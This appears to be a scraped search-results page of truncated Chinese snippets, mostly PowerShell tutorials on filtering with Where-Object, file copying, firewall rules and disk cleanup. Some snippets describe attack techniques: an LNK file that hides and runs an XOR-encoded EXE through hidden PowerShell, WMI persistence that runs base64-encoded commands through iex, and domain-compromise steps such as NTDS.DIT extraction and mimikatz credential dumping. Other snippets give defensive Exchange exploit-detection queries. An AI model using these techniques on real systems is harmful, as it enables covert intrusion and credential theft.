like相似过滤 > ls . | ?...,然后通过Sort -Descending对文件信息按照Name降序排列,最后将排序好的文件的Name和Mode格式化成Table输出。...-DestinationPath 指定目标路径+目录或者压缩文件 基础示例: #建立一个新文件 New-Item -ItemType File test.txt -Force #压缩 Compress-Archive...Format-List: 将输出的格式设置为属性列表,其中每个属性均各占一行显示。 Format-Table: 将输出的格式设置为表。...Force] [-Expand ] [-InputObject ] [] #在格式-定制小命令格式化为以交替的视图定义的命令的输出
使用vbs脚本来查询 ' Script for getting current logged user name on Domain ' Author : mwpq ' www.sharecenter.net...2.使用Logondomaincomputersuser.exe来查询 3.使用powershell枚举远程主机登陆会话PowerQuinsta 是powerview里的一个模块,可以枚举远程主机的登录会话...但是这不是重点,重点是作者详细的介绍了从qwinsta命令到windows API分析,然后再到powershell的开发,之前想表明powershell和.Net的关系,然后还可以借助.Net和其他的联系开发出更多适合场景的小工具之类的...{ $_ -like $searchtext } | ForEach-Object { $_.FullName } ?...{ $_.isStatic} | Where-Object { $_ -like $searchtext } | ForEach-Object { "[{0}]::{1} --> {2}" -f `
System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')) 第一行执行完毕后会提示重启机器,先重启机器,再重新执行第一行,然后是后面...\install-sshd.ps1" #卸载命令是powershell -file "C:\Program Files\OpenSSH-Win64\uninstall-sshd.ps1" 上图是第一次执行第一行命令...StartupType 'Automatic' Set-Service -Name ssh-agent -StartupType 'Automatic' 最后说一下Windows上ssh server配置文件位置...在服务端C:\ProgramData\ssh\下(首次启动sshd后会生成该文件夹),配置文件是sshd_config C:\ProgramData\ssh\sshd_config 服务端配置ssh免密码登录可参考...客户端来连接ssh服务端,从原理上讲,不论什么系统的服务器,只要配置好了ssh服务就行(需要sshd和ssh-agent都正常,如果是Windows服务器,那就是方法三和方法四),可参考vscode 使用
有些字段可以作为选项,来进行命令筛选 例如:用Command-Type作为选项,查询命令类型为Alias的所有命令 wKioL1gVv5jijS1CAAAiSQEUO8M918.png 例如:将Name...作为选项,查询Name中包含Add的所有命令 wKiom1gVwMjwm7GmAAAZr6bnVDQ530.png 管道: 管道符号:| 命令1 | 命令2 | 命令3 用法:将管道前的输出结果交给管道后的命令来处理...,通常用于筛选或者获取属性 通用筛选语句: Where-Object:别名为?...wKioL1gVxIOxXy9kAAANe8aDOzI452.png 语法: 管道前命令| Where-Object {$_.字段名 -eq/like "关键字"} 字段名:命令查询出来的列名 -eq:...通常用于精确查询,用于数字列的情况,也可以用于文字列,但是要求字符完全匹配 -like:通常用于模糊查询,用于文字列的情况,也可以配合通配符“*”使用 例如:搜索Name为copy的命令 image.png
# 6.将SizeInMB脚本方法添加到FileInfo对象,该对象将文件大小计算为最接近的兆字节。...ScriptMethod -Name "SizeInMB" -Value $S $A.SizeInMB() 0.01263 0.00176 0.00164 # 7.此函数用于将一个对象的所有属性复制到另一个对象...(Get-Service -Name TermService).Stop() # 6.使用 Start-Service cmdlet 指定 PassThru 参数,以使其生成输出,然后通过管道将输出传递到...Descending选项 ls | Sort-Object Length -Descending # 通过ls获取当前目录的所有文件信息,然后通过Sort -Descending对文件信息按照Name降序排列...`Sort Object`使用脚本块将字符串转换为整数。 # 在示例代码中,`[int]`将字符串转换为整数,`$\`表示每个字符串在管道中的位置。
-Stream #参数用于从文件中获取特定的备用NTFS文件流,支持通配符。 使用星号*来获取所有流。 -Stream参数在文件夹上无效。它是一个动态参数,仅在文件系统驱动器中起作用。...- 将项目从一个位置复制到另一个位置 描述: 该 cmdlet将项从一个位置复制到同一命名空间中的另一个位置。...例如它可以将文件复制到文件夹,但不能将文件复制到证书驱动器。...请注意具有相同名称的文件将在目标文件夹中被覆盖。 Copy-ItemProperty 命令 - 将属性和值从指定位置复制到另一个位置。 描述: 描述 cmdlet将属性和值从指定位置复制到另一个位置。...例如,可以使用此cmdlet将一个或多个注册表项从一个注册表项复制到另一个注册表项。
LNK 文件执行一些 Powershell 命令从 LNK 的末尾读取 EXE 的内容,将其复制到 %TEMP% 文件夹中的文件,然后执行。 我开发了一个从目标 EXE 文件创建 LNK 的程序。...我们可以硬编码文件名,但这不是一个可靠的解决方法。通过将 LNK 文件的总大小存储在 Powershell 命令中并检查当前目录中的所有 *.LNK 文件以找到具有匹配文件大小的文件来解决此问题。...这已通过将图标位置(使用 HasIconLocation 标志)设置为“%windir%\system32\notepad.exe”来解决。...image.png 5.将鼠标悬停在 LNK 文件上会显示位置为“cmd”。...通过使用 XOR 对 EXE 文件数据的每个字节进行“加密”和“解密”,这一点得到了改进 完整的 LNK 目标如下所示: cmd /c powershell -windowstyle hidden $lnkpath
[TOC] 3.运行脚本 描述: 脚本和批处理都属于伪可执行文件,它们只是包含了若干命令行解释器能够解释和执行的命令行代码。...# 1.执行批处理文件:批处理是扩展名为”.bat”的文本文件,它可以包含任何cmd控制台能够处理的命令 PS C:\PS> ....”like”过滤当前应用的数组, 这里可以用比较运算符结合控制台命令匹配出所有条件。...参数位置传值法它实际是一个对象数组,注意输入参数的位置是固定的并且args[0]表示命令中输入的第一个参数并非脚本名称(与Bash Shell有区别) # args.ps1 文件内容 Write-Host...{ $_ -match "Success" } -split $IP | Where-Object { $_ -like "192*" } | Out-File -FilePath IP-Successful.txt
- 添加一个新的防火墙规则 描述: 该命令创建一个新的入站或出站防火墙规则,并将该规则添加到目标计算机。...GPO,请使用带有NewPolicyStore参数的Copy-NetFirewallRule 复制现有规则然后使用此cmdlet删除旧规则。...Set-NetFirewallApplicationFilter 命令 - 从目标计算机修改防火墙规则的程序和程序包条件。...Disable-NetFirewallRule 命令 - 禁用当前已启用的防火墙规则 描述: 重要说明不带参数运行此cmdlet将禁用目标计算机上的所有Windows防火墙规则,将禁用先前启用的防火墙规则在计算机或组策略组织单位内无效...基础示例: # 1.启用|禁用所有文件和打印机共享规则。使用通用的世界范围内的间接字符串@FirewallAPI来指定组。
勾选“临时文件”、“回收站”、“系统缓存”等选项,然后点击“确定”。手动删除临时文件夹del /s /q %temp%\*%temp% 是当前用户的临时文件夹路径。...使用PowerShell卸载软件Get-WmiObject -Class Win32_Product | Where-Object { $_.InstallLocation -like "C:\Program...切换到“位置”选项卡,修改路径为其他磁盘(如D盘)。点击“应用”,系统会自动迁移文件。4. 清理Windows更新文件Windows更新会留下大量旧版文件,这些文件可以安全删除。...使用DISM工具清理更新文件DISM /Online /Cleanup-Image /StartComponentCleanup该命令会清理旧的Windows更新组件。...禁用休眠功能如果不需要使用休眠功能,可以禁用以释放C盘空间。禁用休眠功能powercfg /h off该命令会删除休眠文件(hiberfil.sys ),通常可释放数GB空间。8.
正确的办法应该是提权后执行命令,完整的powershell命令如下(我提前把AdvancedRun.exe放到C:\Windows\了),提权参考我的这篇文档:https://cloud.tencent.com...System32\WindowsPowerShell\v1.0\powershell.exe" /StartDirectory "C:\" /CommandLine "" /RunAs 4 /Run 然后上一步打开的...powershell窗口里执行下面的命令 注意,执行代码后重启机器看效果 reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows...| Where-Object { $_.TaskName -like "GoogleUpdateTaskMachine*"} | Disable-ScheduledTask 2>$null $services...然而,对系统稳定性和正常使用的影响应该相对较小。在禁用这些任务之前,请确保了解这些操作可能带来的潜在影响,并确保有其他方法来检测和解决潜在问题。
脚本只是在 PowerShell 控制台中以交互方式运行的相同或类似命令,只不过它们保存为 .PS1 文件; 0.条件判断 Where-Object 语句 描述: Where-Object会对集合逐个过滤...{$_.company -like '*Microsoft*' } | select Name,Description,Company # 3.因为Where-Object的使用概率比较高,所以有一个很形象的别名...ForEach-Object 语句 描述: ForEach-Object 是用于循环访问管道中的项的 cmdlet,例如使用 PowerShell 单行命令然后通过管道流式处理对象。...如果要统一限制所有元素的类型,可是使用类型名和一对方括号作为数组变量的类型。 每当赋值时会自动类型检查, 如果目标数据类型不能转换成功,就会抛出一个异常。...$widthPos - 28个占位符,然后重置光标的位置至当前位置, $newPos.X+=( $widthPos - 24 ) $host.ui.rawui.CursorPosition =
好像关于Powershell说的已经差不多了,所以最后一篇文章就来使用Powershell写一些脚本,帮助我们完成一些日常工作。 文件管理 常用命令 先来看看常用的文件管理命令。...我们可以通过管道,将文件信息对象传递给命令Select-Object,让它帮我们显示所有属性。这里只粘贴了一点点内容,其实文件信息很长,大家可以自行尝试。 λ Get-Item ....比方说,我想要列出所有.md格式的文件,就可以使用下面的命令。...,不过好像Get-ChildItem没有正则表达式查询的命令行,不过我们可以使用Where-Object命令来自定义查询。...下面同样是查找所有.md格式的文件,不过这次使用了Where-Object和正则表达式,其中Where-Object里面的$_是形式变量,代表每次迭代的文件。
1.2.5.SMTPEventConsumer 每次将事件传递给它时,都使用 SMTP 发送电子邮件。此使用者可在 Windows 2000 及更高版本上使用。...2.0.查找 WMI 实例 我们可以使用 Get-WMIObject 和由root\Subscription组成的 –Class 参数,然后指定我们希望查看的适当类 #List Event Filters...首先,将创建将与我的 splatting 一起使用的哈希表,这些也是不会随每个 WMI 实例更改的通用参数。...$VQI79dcf; Consumer = $NLP35gh }; 这里创建两个 WMI事件过滤器和两个 WMI事件Consumer,Consumer启动 base64 编码的 PowerShell 命令的命令行...$WY79ad')) | iex 最后,脚本将加密的有效负载存储在 Windows 注册表中,在样本中,攻击者似乎对每个目标使用不同的注册表位置。
指定要复制的文件的位置和名称。该参数必须包含驱动器或路径。 Destination 指定要复制的文件的目标。该参数可以包含驱动器号和冒号、目录名、文件名或者它们的组合。...然后,“xcopy”会将所有指定文件复制到新目录中。默认情况下,“xcopy”将提示您指定“Destination”是文件还是目录。 /s 复制非空的目录和子目录。...将文件或目录从 NTFS 卷复制到 FAT 卷或者当目标文件系统需要 FAT 文件系统命名约定(即 8.3 字符)时,需要“/n”。目标文件系统可以是 FAT 或 NTFS。...• 复制加密的文件 将加密文件复制到不支持 EFS 的卷会导致错误。应首先解密文件或将文件复制到支持 EFS 的卷中。...• “Destination”的默认值 如果省略“Destination”,则“xcopy”命令将文件复制到当前目录。
Get-Process | Where-Object {$_.company -like '*Microsoft*' } | select Name,Description,Company # 根据company...基础使用 # 1.此示例启动一个进程,该进程使用当前文件夹中的Sort.exe文件。...该命令使用所有默认值包括默认窗口样式、工作文件夹和凭据。...nohup命令在当前目录的nohup.out文件中收集输出。 # 为了避免在类Unix平台上终止子进程,可以将Start进程与nohup结合起来。...{$_.Name -like "B*"} # 获取以B开头的服务相关信息 Get-service | Where-Object {$_.Status -eq "Running"} # 对象有哪些属性后就可以采取过滤
如果攻击者可以通过Exchange服务器的身份验证,则他们可以使用此漏洞将文件写入服务器上的任何路径。...可以通过限制不受信任的连接,或者通过设置VPN来将Exchange服务器与外部访问分开来防止这种攻击。使用此缓解措施仅能防御攻击的初始部分。...如果检测到相关活动,则可以使用AnchorMailbox路径中指定的特定于应用程序的日志来帮助确定采取了哪些操作。...\OABGeneratorLog 文件应仅下载到%PROGRAMFILES%\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp 目录 如果被利用,文件将下载到其他目录... { $_.Message -like “*System.InvalidCastException*” } 4.可以通过以下Exchange日志文件检测CVE-2021-27065利用: 这些日志位于以下目录中
Exchange 任意文件写入漏洞(CVE-2021-26858/CVE-2021-27065):经过身份验证的攻击者可以利用漏洞将文件写入服务器上的任意目录,可结合CVE-2021-26855进行组合攻击...{ $_.AuthenticatedUser -eq ” -and $_.AnchorMailbox -like ‘ServerInfo~*/*’ } | select DateTime,...Get-EventLog -LogName Application -Source “MSExchange Unified Messaging” -EntryType Error | Where-Object...{ $_.Message -like “*System.InvalidCastException*” } CVE-2021-26858: Exchange日志目录:C:\Program Files...由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。
如果是无反应的话,可以尝试以下方案: 1.打开任务管理器(或者点击CTRL+Shift+ESC) 2.点击“文件” – “运行新任务” 3.请确保勾选[使用管理员身份创建这个任务] 4.输入”Powershell...” (忽略“”) 5.在Powershell中,输入以下两条命令:(第二条命令需要点击回车) $manifest = (Get-AppxPackageMicrosoft.WindowsStore)....AppxManifest.xml’ ; Add-AppxPackage -DisableDevelopmentMode -Register $manifest Get-AppXPackage -AllUsers |Where-Object...{$_.InstallLocation -like “*SystemApps*”} 6.完成后关闭Powershell 7.重启您的计算机即可。
} (3)自动标记owned用户及机器 SyncDog (4)获取域内DNS信息 adidnsdump 域渗透——DNS记录的获取 2、获取域控 (1)SYSVOL SYSVOL是指存储域公共文件服务器副本的共享文件夹...Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。...同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上 可参考: 寻找SYSVOL里的密码和攻击GPP(组策略偏好) Windows Server 2008 R2之四管理Sysvol文件夹 获取...Invoke-NinaCopy 方法: 使用VSS卷影副本 Ntdsutil中获取NTDS.DIT文件 PowerShell中提取NTDS.DIT 使用Mimikatz提取:mimikatz lsadump...密码同步将域控权限持久化 DCShadow:一种新型AD攻击技术 (2)Security Support Provider 参考:域渗透——Security Support Provider – 三好学生
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
腾讯会议
云直播
对象存储
